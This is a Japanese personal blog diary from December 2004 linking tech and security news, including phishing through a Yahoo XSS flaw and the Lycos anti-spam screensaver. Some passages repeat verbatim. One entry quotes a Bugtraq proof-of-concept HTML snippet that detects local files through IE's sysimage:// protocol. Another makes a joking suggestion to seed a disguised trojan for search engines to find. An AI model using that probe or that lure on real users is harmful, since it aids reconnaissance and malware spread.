textile米陸軍は来年3月、Foster-Miller社製ロボット「Talon」の展開を始める計画だ。このロボットには、マシンガン「M240」または「M249」が装備される予定であると、Foster-Millerの広報担当は述べる。Talonにはこのほかにも、ロケットランチャーの装備が可能である。…多くのロボットとは異なり、マシンガンを装備したTalonは自己制御を行わない。人間が無線またはファイバーネットワーク経由で指令を送ることによって初めて銃が制御されるようになっている。一歩一歩、ターミネーターな世界へ近づいて行きますねー。そのうち自律型が出て来て、暴走したりするんでしょうか?(^-^; (無線経由だと敵からの妨害・のっとりが心配? いきなり自陣で暴れだしたら手がつけられないよなぁ...こわい、こわい。)[雑談] * ほぼ日刊イトイ新聞 - 樹の上の秘密基地。
**[Video]**Nintendo DS を使った合奏。バンドブラザーズの開発者の方々...なのでしょうか?[IT] * IBM、パソコン事業売却へ 中国大手と交渉と米紙報道
textile米コンピューター大手IBMがパソコン事業を売却する方向で、中国のパソコン大手レノボ(聯想)グループと交渉していると3日、米紙ニューヨーク・タイムズが報じた。交渉に近い筋からの情報としており、売却価格は10億〜20億ドル(約1030億〜2060億円)。…日本勢では、東芝に対して売却の打診があったが、同社は断っている。openmyaMLで話題になっていました。「上位10社のうち3社」の“3社”にまさかIBMが入ってるだなんて、びっくりですよね。(サポートはもちろん継続してくれるんでしょうかね。)[セキュリティ] * スパム攻撃のスクリーンセーバ提供中止 (ITmedia)
textileスパムサイト攻撃で論議を呼んでいたスクリーンセーバの配布が中止されたようだ。Lycos Europeが配布に使っていた「Make LOVE not SPAM!」のサイトは米国時間の12月3日現在、「STAY TUNED」(引き続き注目を)のメッセージとロゴのみが表示され、スクリーンセーバの提供を行っていない。配布中止して正解だと思いますけどね。それにしても、* 「STAY TUNED」
ですか。まだ何かやらかすつもりなんでしょうか?(^-^;[雑談] * 米刑務所、囚人による暴力的ゲームの使用を禁止に (ITmedia)
を。刑務所の中にレクリエーションセンターなんてあるのね。しかも、PlayStation 2 のゲームが 80本も置いてあるだなんて・・・。
textile「(ビデオゲームの購入は)刑務所の運営にプラス効果をもたらすとともに、収容者を何かに集中させることで脱獄したり他人を傷つけようとすることから気を反らす効果がある。ふーん。そーゆーもんなんですかい。[雑談] * 2004年版、オタクにぴったりのクリスマス・ギフト案内 (Wired News)
“オタク”な人にプレゼントを贈る人は、ぜひ参考に・・・ならないな、これ。(^-^; (こーゆー系の人は欲しい物にコダワリがありそうだから、ぜひ本人に何が欲しいか聞いてあげてくださいな。サプライズ!させたい人は仕方が無いですけどー。)
2004/12/05(日)日曜日ー。(ふぅ。)
[雑談] mixi
textile5日(日)午前3時より、サーバーの障害が発生しております。ご迷惑をお掛けして申し訳ございません。5日(日)の午後3時以降に再度アクセスして頂ければ幸いです。ご迷惑をお掛けして申し訳ございません。大丈夫ですかい? とうとうメンテが12時間越えるようになってしまった?(^-^;[雑談] * 「おじいちゃんの幽霊が怖い」——息子のために父親の霊をオークションにかけた女性 (ITmedia)
textile「おじいちゃんの幽霊が怖い」という6歳になる息子をなだめるため、ある女性が自分の父親の幽霊をeBayでオークションにかけたところ、34人の入札があり、最高額は78ドルとなっている。…「杖(と幽霊)を受け取ったら、私の息子に手紙を書いてほしいのです。幽霊はあなたとともにあり、うまくやっていると」「幽霊つきのおじいちゃんの杖」でちゃんと取引が成立してるのがすごい。(汗まー、この話は事情がアレですけど、それにしても最近のオークションって何でもアリなような。(^-^;
2004/12/06(月)月曜日ー。(今週も頑張りませう。)
[セキュリティ] * ヤフーからの通知を装った日本語フィッシングで何が起きていたか (高木先生の日記)
に起きた「Yahoo! を偽装するフィッシングメール」の話が分かりやすくまとめられていました。Yahoo! に存在したクロスサイトスクリプティング問題を悪用して“偽フレーム”を表示させることで、URL からフィッシングだと判断されにくくする工夫が行われていたようです。また、入力されたパスワードを本番サイトに中継して真偽を判定する念の入れようだったみたいですね。ここまでされると、ある程度詳しい人でも十分罠にかかってしまうでしょうねー。怖い、怖い。また、下記の点も興味深いですね:
[雑談] * 機内に爆発物、誤って“素通り”…仏空港で訓練中 (ZAKZAK)
」(著.高畑京一郎)を思い出しました。懐かしい。将来、香りまで自由に合成できるようになってしまったら、もうバーチャルリアリティか現実かの区別ができる手段が無くなっちゃいますね。(笑)[雑談] * 「地震除け」不動明王に問い合わせ相次ぐ 山形
**[PDF]**[雑談] 北海道で地震ですか釧路で震度5強だそうですね。津波注意報も出ているようです。[TV][あいのり] #248 もう一度笑顔を・・・エチオピア縦断中。「史上初の8人の旅」と今田耕司さんが言ってましたが、パオロの時(は例外か?)と、ミッシェルの時があったので、3回目かも? それにしても、同じ8人でも、男4人+女4人なら良いのに、男5人+女3人だと、若干見ていてもツライものがありますね。(^-^;「歯医者なのに話が噛み合わない」と言われてた歯医者→瀬里葉の専門用語オンパレードな話を聞いてると、タケを思い出すなぁ。なるほど。気をつけるようにします。無事にお姉さんが見つかって良かったですね! 瀬里葉に似てたかは微妙ですけど。(笑)何だかアフリカの旅って話が重くなりがちですよね。(汗確かに最近の瀬里葉は、自分をしっかり持ってるし、頼りになる一面もあるし、強くなったなぁって思えますね。⇒* 今週のあいのり
、* あいのりウラ話
に起きた「Yahoo! を偽装するフィッシングメール」の話が分かりやすくまとめられていました。Yahoo! に存在したクロスサイトスクリプティング問題を悪用して“偽フレーム”を表示させることで、URL からフィッシングだと判断されにくくする工夫が行われていたようです。また、入力されたパスワードを本番サイトに中継して真偽を判定する念の入れようだったみたいですね。ここまでされると、ある程度詳しい人でも十分罠にかかってしまうでしょうねー。怖い、怖い。また、下記の点も興味深いですね:
textile**XSS脆弱性のもうひとつの脅威が実証されてしまった**cookieを使っていないサイトでは、「たいした問題ではない」とされることが多かった。そうしたとき、「偽の情報を本物ドメインの画面に表示させられる」という危険性があると訴えられていたが、「そんな罠をしかける人、本当にいるの?」とか、「そんな罠に騙される人いるの?」という反応が少なくなかった。しかし、図らずも、「フィッシング詐欺」という名前まで付く攻撃手法が蔓延してしまい、そのときの危惧が現実のものとなってしまった。クロスサイトスクリプティングの脅威・影響と言うと、どうしても、『あなたのサイトの利用者のブラウザ上で、スクリプトがあなたのサイトの権限で実行されてしまうんですよー。これを攻撃者に悪用されると、Cookieを盗用されたり、データの送信先を勝手に変更されてしまったりしまって、サイトの利用者が被害を被るかも知れませんよ。あと、風評被害も怖いですよー。』てきな説明になりがちでしたが、これからは、『最近はやりのフィッシングに利用されてしまうかも知れませんよ。実際にこういう実例がありました・・・』てきな話もできますね。サイト運営者側も、クロスサイトスクリプティング、と聞くと、「あぁ、なんだ。うちのサイトは・・・」てきな反応をしがちなのを改めて頂きたいところですね。(もっとこのような事例が、広く技術者に紹介されたりするようだと良いのですけどねー。)[IT] * 海賊版を検知する「見えないテクノロジー」 (ITmedia)
textile街頭で売られ、インターネット上にアップロードされている海賊版「ミスターインクレディブル」など、ビデオカメラを使った海賊行為が、間もなく“目に見えない”テクノロジーによって検知されるようになるだろう。…映画鑑賞者に見えないだけでなく、粗雑な複製により画質が低下しても残る透かしを考案した。…この透かしは5秒間かけて段階的に現れる。変化のスピードが遅い画像を補正・無視しようとする人間の視覚を利用していると同氏は説明した。新しい電子透かしの技術で、画質が低下しても大元が追跡できるようです。[雑談] * 電柱から電気“拝借”料金滞納送電止められ… (ZAKZAK)
textile不法に電気を使用したとして、茨城県警つくば中央署は6日までに、つくば市上岩崎の無職の男(55)を窃盗容疑で逮捕した。…男は、電気メーターを通さず市販のビニール製コードで電柱と配電盤を接続。11月29日午後6時20分ごろから同日午後10時半ごろまで断続的に室内の電灯を点灯させ、不法に電気(料金14円相当)を使用した疑い。パトロール中の同署員が電柱からコードが延びているのを発見。送電が停止されているのに電気がついていることを確認し、逮捕した。電柱からコード引き込むなんて大胆な盗電ですね。(^-^; 盗電は、被害額が少なくても立件されがちな気がするので、ほんの出来心とかで使わないように要注意ですね。駅のコンセントも使っちゃダメ!と。[セキュリティ] * 仕返しが仕返しを呼ぶ Lycos Europe のスパム対抗ツール
textileセキュリティ会社の F-Secure は、同キャンペーンサイトが度々アクセス不能になったことについて、Lycos 自身が行なった DDoS 攻撃のトラフィックが跳ね返ってきたことにも、一部原因があるかもしれないと分析する。F-Secure によると、Lycos が攻撃対象としたサイトのうち、少なくとも1つは、そのトラフィックをすべて同キャンペーンサイトにリダイレクトしていたという。へー、そんなことになってたのですか。どーゆーレベルでのリダイレクトなんだろう?
textileLycos および同社のサイト管理会社は、サイト改竄を否定した。これに対して F-Secure の調査チームは、ユーザーから上がったサイト改竄報告は、いくつかの ISP が同サイトへのアクセスをブロックした結果か、もしくは「DNS ポイズニング」というクラック手法が原因となった可能性があると述べた。DNS ポイズニングとは、悪意ある攻撃者が DNS サーバにリクエストを大量に送りつけ、偽の応答を返すようにするもので、攻撃対象の DNS サーバの応答に依存するリクエストを発したユーザーを、偽のサイトに誘導できる手法だ。DNSポイズニングと、DNSspoofが交じったような説明だな、これ。(^-^;キャッシュ書き換えなんて今どきのDNSで有効なんでしょうか? DNSspoofだと、今度は影響範囲が限られてくるしなぁ。前の“スクリーンショットの捏造”の方が説得力あるかも?[セキュリティ] * IE6.0 SP1でJavaScript使用ページにアクセスするとフリーズする可能性
textile今回の現象は、JavaScriptによるイベント登録を行なうページにおいて、IEで「ページの更新」を繰り返し行なうことによってメモリの使用量が増え続け、メモリリークが発生する場合があるというもの。例えば、「onmousedown」などのイベントを使用することでこの現象が発生する可能性があるとしている。…マイクロソフトでは、同現象を再現するサンプルコードも公開。「現在、再現性を含めて詳細を確認中だ」としている。そう言えば、前の“”の件は、その後?関連: * [IE] Javascript で動的にイベントを登録するとメモリリークが発生 (Microsoft)
[雑談] * 機内に爆発物、誤って“素通り”…仏空港で訓練中 (ZAKZAK)
textileパリ郊外のシャルル・ドゴール空港で3日に行われた警察犬の訓練中、故意に手提げ袋に入れられた小型の爆発物が誤ってそのまま機内に積み込まれ、5日になっても行方不明になっていることが分かった。警察当局によれば、今回の訓練は、警察犬2頭に対して麻薬などの危険物探知能力を試す目的で実施。チェックインカウンターで預けられた荷物から無作為に選び、機内積み込み場所までの間に爆発物を紛れ込ませ、犬が無事に発見できるかテストしていた。まー、イヌ相手の訓練なので、本物の爆発物でやらなきゃいけなかった事情は分かるんですが、そのまま積み込まれて行方不明って。(汗その見逃した方の爆発物探知犬は、今までも見逃してた可能性もあるってことかな?(^-^;[雑談] * NTTコム、幸運を呼ぶ香りを発生させる「香り通信」
textile「香り通信」は、ミラプロが開発した、PCにUSB接続された32種類の液体香料を調合・発散する装置「香り発生装置」を用いて実現される。今回開催されるイベントは、誕生日を入力すると、占星術研究家 岡本翔子氏による占星術に基づいた運勢とともに2005年に幸運を引き寄せる香りのレシピが表示されるというもの。ユーザーは表示されたレシピをクリックすることにより、PCに接続されている香り発生装置から送り出される芳香を楽しめるという仕組みだ。そのうち、開けたら物凄く嫌な匂いのする不幸のメールとか出てくるんでしょうか?(^-^;何となく、「* クリス・クロス
」(著.高畑京一郎)を思い出しました。懐かしい。将来、香りまで自由に合成できるようになってしまったら、もうバーチャルリアリティか現実かの区別ができる手段が無くなっちゃいますね。(笑)[雑談] * 「地震除け」不動明王に問い合わせ相次ぐ 山形
textile新潟や北海道で地震が続く中、「地震災難除(よ)け」を掲げる山形県上山市の久昌寺に問い合わせが相次ぐ。不動明王がナマズを押さえつける本尊とお札に関するものだ。…設計・建設会社の経営者の顔も持つ住職は、耐震構造の重要さが認知されていないことを嘆く。「防災に一番大事なのは、神仏頼みではなく普段の心構えです」確かにそうなんでしょうけど、住職、せっかく「地震災難除け」思いついたのにそんなこと言っちゃってて良いんでしょうかね?!(^-^;[雑談] * アーティストはファイル交換を気にしていない? (ITmedia)
textileユーザーが楽曲などのコンテンツをタダでコピーできるオンラインファイル交換サービスが存在しているにもかかわらず、ほとんどのミュージシャンとアーティストは、インターネットは自分の作品からより多くの利益を生み出すのに役立ったと述べている。47%は自分の作品のロイヤリティを稼ぐ邪魔になると回答43%は作品のプロモーション・流通に役立ったと回答アーティストの3分の2はファイル交換はほとんど脅威にならないと回答3分の1弱がファイル交換がクリエイティブ業界にとって大きな脅威になると回答インターネットが創造的な作品を守る力を削いだと回答したのはわずか3%インターネット全般(ファイル交換を含む)に対するアーティストの印象は、意外にも好印象みたいです!? ファイル交換を気にしてるのは、アーティストではなく、実は発売元の会社とか業界団体とかがメインなのでしょうかねー?(^-^;ところで、
textile同団体の報告書は、2003年12月に自分をアーティストと見なしている809人を対象に行った調査に基づくもの。アンケート対象は、・・・自称アーティストさん?(笑)関連: * Pew Internet and American Life Projectの調査報告書
**[PDF]**[雑談] 北海道で地震ですか釧路で震度5強だそうですね。津波注意報も出ているようです。[TV][あいのり] #248 もう一度笑顔を・・・エチオピア縦断中。「史上初の8人の旅」と今田耕司さんが言ってましたが、パオロの時(は例外か?)と、ミッシェルの時があったので、3回目かも? それにしても、同じ8人でも、男4人+女4人なら良いのに、男5人+女3人だと、若干見ていてもツライものがありますね。(^-^;「歯医者なのに話が噛み合わない」と言われてた歯医者→瀬里葉の専門用語オンパレードな話を聞いてると、タケを思い出すなぁ。なるほど。気をつけるようにします。無事にお姉さんが見つかって良かったですね! 瀬里葉に似てたかは微妙ですけど。(笑)何だかアフリカの旅って話が重くなりがちですよね。(汗確かに最近の瀬里葉は、自分をしっかり持ってるし、頼りになる一面もあるし、強くなったなぁって思えますね。⇒* 今週のあいのり
、* あいのりウラ話
2004/12/07(火)火曜日ー。(仕事、仕事。)
[セキュリティ] * 「ポルシェ当選」に注意、Yahoo!BBのキャンペーンを騙ったフィッシング詐欺が発生 (ITmedia)
```textileYahoo!BBキャンペーン事務局を騙り、「ポルシェが当選した」などの名目で個人情報を詐取するフィッシング詐欺が発生した。…同社の* 追加情報
によれば、この詐欺メールにしたがって個人情報を入力してしまった人物に対し、「ポルシェの納品に必要な経費だから」という理由で、早急にお金を振り込むよう求める不審な電話がかかってきたという。```Yahoo!BBがらみのフィッシング、続きますねー。今回は普通の(?!)フィッシングみたい。関連: * 【重要】詐欺メール注意のお知らせ (ソフトバンクBB)
[セキュリティ] * 今年はフィッシング詐欺激増の年、来年も要警戒 (ITmedia)
もう 一年のまとめ とか出ちゃう季節になったんですね。。。光陰 矢の如し?
[便利] * エキサイト、乗り換えに便利な位置も表示する「乗り換え案内」サービス
```textileエキサイト株式会社は2004年12月6日、現在提供している乗り換え案内サービス「* エキサイト乗り換え案内
」に、「乗り換え位置の表示」機能を追加した。乗り換え位置の表示機能は、乗り換えに便利な場所や車両を表示し、どの位置で電車に乗車すればいいのかが一目でわかり、次の電車への乗換えをスムーズに行うことができる。```試しにやってみたら『乗換に便利な場所は 3、4 両目です。』みたいに表示されるようですね。便利なようなそうでも無いような微妙な感じですね。(笑) 検索結果の駅周辺の「天気予報」と「周辺地図」が表示できるリンクがあるんですが、最近の「スポット天気予報」って市区町村よりも細かいレベルで出るんですかー。びっくり。(ま、ほとんど市区町村の予報のコピーかも知れませんけど。)[雑談] * 無線LANからの遠隔操作に対応したWebカメラ搭載の2足歩行ロボット
[セキュリティ] * フィッシング詐欺対策も行なうパスワード管理サービス、米企業が発表
身近に理数系のマニアックな友人がいる人は紹介して反応を楽しみましょう。(^-^;[雑談] * “目的のない”MMORPG、なぜ女性を惹きつける? (ITmedia)
[雑談] * 「ラーメンのにおいかぎたい」護送中の少年逃走 (ZAKZAK)
[セキュリティ] * [WSJ] “賃貸ウイルス”の時代がやってきた (ITmedia)
「賃貸ウィルス」とは何ぞや?!と思ったら、要するに、最近は“趣味や遊び”での攻撃ではなく、“金銭目的”でサイトを攻撃するケースが増えてきた、という話ですね。「賃貸」たる所以は、
まだゲームをやっていない!のに出すなんて、ものすごく気の早いレポートですな。(^-^;
```textileYahoo!BBキャンペーン事務局を騙り、「ポルシェが当選した」などの名目で個人情報を詐取するフィッシング詐欺が発生した。…同社の* 追加情報
によれば、この詐欺メールにしたがって個人情報を入力してしまった人物に対し、「ポルシェの納品に必要な経費だから」という理由で、早急にお金を振り込むよう求める不審な電話がかかってきたという。```Yahoo!BBがらみのフィッシング、続きますねー。今回は普通の(?!)フィッシングみたい。関連: * 【重要】詐欺メール注意のお知らせ (ソフトバンクBB)
[セキュリティ] * 今年はフィッシング詐欺激増の年、来年も要警戒 (ITmedia)
もう 一年のまとめ とか出ちゃう季節になったんですね。。。光陰 矢の如し?
textile2003年9月にMessageLabsが遮断したフィッシング詐欺メールは279通にすぎなかったが、今年9月にはこの件数が200万通強にまで激増。今年遮断したフィッシングメールの総数は1800万通を超えた。…スパムとウイルスの割合も過去1年で増加。ウイルス感染率は2003年の平均が33対1だったのに対し、今年は16対1となった。今年は、フィッシング詐欺が急増。手口も巧妙化しているし、ウィルス含有率も高くなっている、と。来年以降も引き続き注意が必要ですね。関連:
- 2004年下半期にフィッシングメール急増、スパム・ウイルスも減らず (MYCOM PC WEB)
- プレスリリース (MessageLabs)
[便利] * エキサイト、乗り換えに便利な位置も表示する「乗り換え案内」サービス
```textileエキサイト株式会社は2004年12月6日、現在提供している乗り換え案内サービス「* エキサイト乗り換え案内
」に、「乗り換え位置の表示」機能を追加した。乗り換え位置の表示機能は、乗り換えに便利な場所や車両を表示し、どの位置で電車に乗車すればいいのかが一目でわかり、次の電車への乗換えをスムーズに行うことができる。```試しにやってみたら『乗換に便利な場所は 3、4 両目です。』みたいに表示されるようですね。便利なようなそうでも無いような微妙な感じですね。(笑) 検索結果の駅周辺の「天気予報」と「周辺地図」が表示できるリンクがあるんですが、最近の「スポット天気予報」って市区町村よりも細かいレベルで出るんですかー。びっくり。(ま、ほとんど市区町村の予報のコピーかも知れませんけど。)[雑談] * 無線LANからの遠隔操作に対応したWebカメラ搭載の2足歩行ロボット
textileSpeecysロボットキットは、頭部に35万画素のCMOSイメージセンサーを採用したWebカメラを装備。また本体にはCFカードスロットを2ポート搭載し、1ポートはIEEE 802.11b準拠した無線LANカードを装着できる。これにより、インターネットを経由してロボットのカメラ映像をパソコンで確認できるほか、付属のソフトウェア「Speecys System」を利用してパソコンから無線LANによるロボットの遠隔操作が可能になる。微妙に男の子心をくすぐられますが、522,900円はちょっとさすがに。(^-^;関連: * スピーシーズ
[セキュリティ] * フィッシング詐欺対策も行なうパスワード管理サービス、米企業が発表
textileProtecteerのサービスでは、SignupShieldを使ってユーザーが個人情報を入力しようとしているサーバーのIPアドレスと、そのサーバーが地理的にどこにあるのかを表示してくれる。米国の銀行にログインしようとしているはずなのに、情報の送信先サーバーがロシアにあると表示されたら明らかに怪しいと考えられるため、銀行に問い合わせるなどして確認することができるだろう。うーむ、地理的な位置なんてあんまし役に立たないような。必ずしも会社がある場所と、サイトがある場所が同じとは限らないですし、それに、両方 同じ国だったら分からないってことですよねー。私だったら、**「入力しようとしているサーバ」ではなく、「データ送信先のサーバ」の情報を表示して欲しい。**(データ送信時にパーソナルFWチックに一時停止して表示して、送信の可否を選択させるとか。)⇒例えば、XSS で送信先を変更されるような場合、「入力しようとしてるサーバ」は正規なのに、「データの送信先のサーバ」が変更されている場合が考えられますからね。(あ、でも、どういう時に停止すれば良いんだろう? POSTメソッドかどうかだけじゃ止まりまくりだろうしなぁ。あらかじめ、流出したくない情報(住所の一部とかクレジットカード番号の一部とか)をソフトに登録させておく?(笑))表示して欲しい情報は・・・データ送信先サーバのIPアドレス、DNS名 (ついでに、whois調べるボタンとか。)入力しようとしてるサーバと、送信先サーバのドメイン部分くらいまでの一致チェックとか?使用プロトコル http/https(暗号化の有無)https の場合、証明書に関する情報色々送信先サイトがブラックリストに載っているかどうか⇒これらを素人が見ても直感的で分かりやすく表示する!(明らかな異常時は毒々しく。)みたいな感じですかね?(←好き勝手言ってみた。(笑))[雑談] * ナウシカをネットワーク分析する social network analysis (HPO:個人的な意見)
身近に理数系のマニアックな友人がいる人は紹介して反応を楽しみましょう。(^-^;[雑談] * “目的のない”MMORPG、なぜ女性を惹きつける? (ITmedia)
textileダイナスティアには、戦闘もレベルもお金も目的もない。アイテムはあるが、やがて腐って消えてしまう。敵もいないし、倒すべきボスもいない。キレイな男の子はたくさん出てくるけど、彼らを落とすことはできない。このゲームに目的は、ない。…ユーザー同士が中傷しあったりせず、楽しくコミュニケーションできるよう、優しい人ほど得をするシステムにした。最初は、ゲームとしてありえない!と思ったんですが、なるほど、ユーザ同士のコミュニケーション(チャットなど)が主体なのですね。あなたも“聖乙女”(笑)になれますよー!>誰となく関連:
- ダイナスティア
- 女の子のための、なごめるオンラインゲーム『女神幻想ダイナスティア』とは?(Slash Games)
[雑談] * 「ラーメンのにおいかぎたい」護送中の少年逃走 (ZAKZAK)
textile県警留置管理課によると、少年は後部座席に座り、署員3人が同乗していた。ラーメン店近くで少年が「においをかぎたい」と要求、許可して窓を開けさせた。しばらくして少年は窓から手を伸ばし、外側からドアを開けて逃げたという。署員らは手錠をかけていたと話しているが、手錠は施錠した状態で車の外に落ちていた。こーゆーのの積み重ねでどんどん厳しくなってっちゃうのね、きっと。[雑談] * はてな、サイト巡回サービス「はてなアンテナ」の編集機能を強化
textileはてなは、サイト巡回サービス「はてなアンテナ」の機能強化を12月6日に実施した。今回の機能強化は、「巡回先が多くなると管理しづらい」「編集画面がわかりにくい」といったユーザーからの意見を踏まえて、編集画面のリニューアルが図られている。アンテナの画面にいつの間にかエンピツのアイコンが出るようになってたので何かと思ったら、本当だ、何だか編集画面が色々変わっていますねー。[雑談] * ライブドア、投函まで行う年賀状作成サービスを開始
textilelivedoor ポストカードは、はがきの注文から投函までがインターネット上でオーダーできるサービス。多数あるデザインの中から、好みのポストカードデザインを選び、宛先を登録。クレジットカード決済を済ませればオーダーが完了する仕組み。…年賀状には相手へのメッセージを入れることもできる。…12月22日までに注文すれば、元旦に到着することができるとのこと。最近は投函までしてくれるんですか。たーくさん出さなきゃいけない人はどうぞ。もう年賀状の時期ですかぁ。時が流れるのは早いなぁ。(と今日の朝も書いたような気がする。(笑))関連: * livedoorポストカード
[セキュリティ] * [WSJ] “賃貸ウイルス”の時代がやってきた (ITmedia)
「賃貸ウィルス」とは何ぞや?!と思ったら、要するに、最近は“趣味や遊び”での攻撃ではなく、“金銭目的”でサイトを攻撃するケースが増えてきた、という話ですね。「賃貸」たる所以は、
textileインターネットのチャットルームでは、ボットに操られたコンピュータへの接続が、1台につき数セントから1ドルで購入できる。ボットへの指揮権を買うことで、既存のボットネットワークを DDoS に利用したり、spam を送ったりもできるということですね。(どこで売ってるんだろう? 買う方も売る方も詐欺やおとり捜査などに戦々恐々でしょうね。(^-^;)[IT] * アリエル、IP電話「Skype」と連携するスケジュール共有ソフトを公開
textileアリエル・ネットワークは7日、P2P型の無料IP電話「Skype」との連携機能を持つスケジュール共有ソフト「アリエル・マルチスケジューラ」のベータ版を公開した。対応OSはWindows XP/2000/Me/98SEで、同社のWebサイトから無料でダウンロード可能。アリエル・マルチスケジューラはP2P型のスケジュール共有ソフトで、スケジュールデータをP2Pネットワークにより共有することで、サーバーを用意することなく複数人で予定表の共有が行なえる。だそうです。「Skype」は、評判は聞きますが、まだ使ったことないです。[IT] * 早速ゲットしたPSPにしみじみ感動 (ITmedia)
まだゲームをやっていない!のに出すなんて、ものすごく気の早いレポートですな。(^-^;
textile何かと比較されるNDSとPSPだが、…あえて言えば、NDSが愚直にゲームの楽しさを追求した専用機なのに対し、PSPはデジタル家電時代のポータブルAV機器(ゲームもできる)──だ。仕事柄、各編集部が担当する最新ハードをよく見せてもらっているが、個人的には最近では断トツの“クラクラ度”。この液晶のインプレッション力は破壊的で、おそらく“見ると欲しくなってしまう”タイプの製品だ。おー、確かに直接手に取ったりしたら衝動買いしてしまいそう?!! 気をつけねば。[雑談] 溺れる人続出だろうな@openmyaML
textile12月7日(火) 今日一日で流れたメール数openmyaML ⇒あぁ、今日は IP Reachable な場所にいて本当に良かった。(笑)一日溜め込もうものなら、確実に溺れますね、これらのML。469通543通! ←23時過ぎたので油断してたら駄目押しで増えた。(^-^;Love2ML ⇒ 47通 ←参加人数の割には驚異的な流量
2004/12/08(水)水曜日ー。(溺れるー!)
[セキュリティ] * IE6 Vulnerability - Local File Detection (Bugtraq)
適当に和訳:
**[追記]** * はせがわ先生
が回避策について教えてくれました。@openmyaMLHKLM\SOFTWARE\Classes\PROTOCOLS\Handler\の下の sysimage というキーをリネームしておくとよさげ。これで回避できることを確認しました。(どこかでアイコンの表示が崩れるなどの副作用が起きる場合がありますので、**気になる人だけ一時的に**ということで♪)[雑談] (議長ですら溺れる)openmyaMLの流量今日 12月8日(水) の午前中(0:00〜11:59) だけで 352通 のメールが。・・・ありえない。(笑)[セキュリティ] * スパム攻撃スクリーンセーバ装うトロイの木馬出現 (ITmedia)
適当に和訳:
textileInternet Explorer には、リモートの攻撃者が閲覧者のローカルファイルの存在の有無を確認できる脆弱性が存在します。この問題によって、リモートの攻撃者に、閲覧者がどのようなソフトウェアをインストールしているか推測するなどされ、さらなる攻撃の手がかりにされてしまう恐れがあります。これは、MSIE がファイルパスに対応するアイコンを表示する時に使う "sysimage://" プロトコルの挙動の違いによって判断することができます。標準では、存在するファイルパスが与えられた場合はアイコンが表示され、存在しないファイルパスが与えられた場合にはエラーが発生します。検証例:<img src="sysimage://C:\WINNT\Notepad.exe,666" onLoad="document.write('<b>Cannot Find File!</b>');" onError="document.write('<b>File Exists!</b>');">実際に、下記デモサイトで確認することが出来ます。
**[追記]** * はせがわ先生
が回避策について教えてくれました。@openmyaMLHKLM\SOFTWARE\Classes\PROTOCOLS\Handler\の下の sysimage というキーをリネームしておくとよさげ。これで回避できることを確認しました。(どこかでアイコンの表示が崩れるなどの副作用が起きる場合がありますので、**気になる人だけ一時的に**ということで♪)[雑談] (議長ですら溺れる)openmyaMLの流量今日 12月8日(水) の午前中(0:00〜11:59) だけで 352通 のメールが。・・・ありえない。(笑)[セキュリティ] * スパム攻撃スクリーンセーバ装うトロイの木馬出現 (ITmedia)
textileLycos Europeのスパム攻撃スクリーンセーバを装ってトロイの木馬を撒き散らす電子メールが出回っているという。セキュリティ企業F-Secureのブログによれば、このメールは「Be the first to fight spam with Lycos screen saver」(Lycosスクリーンセーバでスパムとの戦いの先陣を切ろう)という件名で届き、「Lycos screensaver to fight spam.zip」という名称のファイルが添付されている。本番サイトで入手できない今なら、メール送らなくても、Googleでひっかかるどこかに さりげなく それらしいファイル名でトロイ置いておいたら誰か騙されそうですね。(^-^;[IT] * アイ・オー・データ機器、ボタン1つでワイヤレス機能のオン/オフが可能な無線LANルーターを発売
textile必要もないときに無線LANを有効にしておくのは、セキュリティー面で問題になりがちだ。今までの無線LANルーターでは、無線LAN機能をオン/オフするにはいちいちパソコンから設定する必要があり、とても手軽にオン/オフできるものではなかった。しかしWN-APG/Rなら、“ワイヤレス”ボタンを押すだけで無線LANをオン/オフできるため、“使うときだけ無線LANのスイッチを入れる”といった感覚で、非常に手軽にオン/オフを切り替えられる。使用者が実際にこまめに ON/OFF してくれるかは別として、面白いコンセプトですねー。これから一般的になるんでしょうかね。(WPA 使ってても不安なもんですかね? 気分の問題かな。)[雑談] 10回クイズ@トリビアの泉
textile言語学と心理学の権威が考える最も引っかかりやすい『10回クイズ』は?前提:「ニシンって10回言って?」質問:「じゃあ、赤ちゃんが生まれることは?」⇒オチ:「妊娠」じゃなくて「出産」です。『10回クイズ』懐かしい〜。流行ってた時、私はちょうど小学生でした。[雑談] * 血液型扱う番組、放送基準に抵触の恐れ・放送倫理機構
textile民放連の放送基準は占いなど非科学的な事柄について「断定したり、無理に信じさせたりするような取り扱いはしない」と定めている。同委員会は、テレビ番組が取り上げる血液型と性格の関係は「証明されていない」とし「血液型で人を価値付けすることは社会的差別に通じる危険がある」と注意喚起した。どんどん話が大きくなって、とうとう放送基準に抵触とか言い始めたのね。(^-^; 個人的には、血液型も占いも面白けりゃ信じる方なので、これで完全にメディアから駆逐されちゃうと寂しいかも?
2004/12/09(木)木曜日ー。(溺れてください。)
[雑談] 昨日のopenmyaMLの流量!!
Secunia脆弱性のデモ
どのようなステップで脆弱性が発現するのか適当に和訳:ユーザが悪意あるサイトを訪問します。そこにある信頼されたサイトへのリンクをクリックします。(信頼されたサイトが新しいウィンドウで表示されます。)信頼されたサイトがポップアップウィンドウを表示しようとした時、悪意あるサイトはそのウィンドウをハイジャックして任意のコンテンツを表示することができます。最近は、主要ブラウザ全部で見つかる!とか多いですねー。(汗Internet Explorer に関しては、もはや修正されてない問題点がいくつあるのかさえ、誰も把握できない状況になってきてしまったかも。(^-^; 「Unpached Internet Explorer Bugs」みたいなサイトって、どこかにフッカツしたんでしたっけ?(←ちゃんと更新されてるやつ。)[雑談] * ブログで会社をクビに——米国で解雇例が続出
ブログに掲載した内容が原因で、解雇されてしまった例が3例挙がっていました。例えば、
```textileテンプレート・素材のダウンロードサイト「 テンプレートBANK 」において、「年賀状プリント決定版2005」の新コンテンツとして、二次元コードを使用した「 * おもしろ暗号メッセージ素材集
」を開始した。おもしろ暗号メッセージは、メッセージを二次元コード化したものを年賀状に印刷し、受け取った人が携帯電話で読み取るとメッセージが表示される仕組み。内容は、他人に見られたくない秘密のメッセージやひとことメッセージ、おみくじ、絵文字など、計57種類。```私の携帯にはカメラついてないので、これが送られてきたらきっと悲しい気分になります。(笑) 実物を見てないので分かりませんが、QRコードですかね? DoCoMo の「* QRファクトリー
」とか使えば、定型ではない自分だけのメッセージ!が作れるかも。トライしてみては?(←私宛て以外の年賀状で!(^-^;)[IT] * 「思考によるコンピュータの操作」に成功 (ITmedia)
[雑談] * 今回は見やすい!「初心者にぜひ」…流星群 (ZAKZAK)
[雑談] * サイバー恋愛に未練は禁物 (Wired News)
**# ずきん (2004/12/09(Thu) 18:34) **
やまがたさめの為の記事でふか? なんですと? どれどれ。
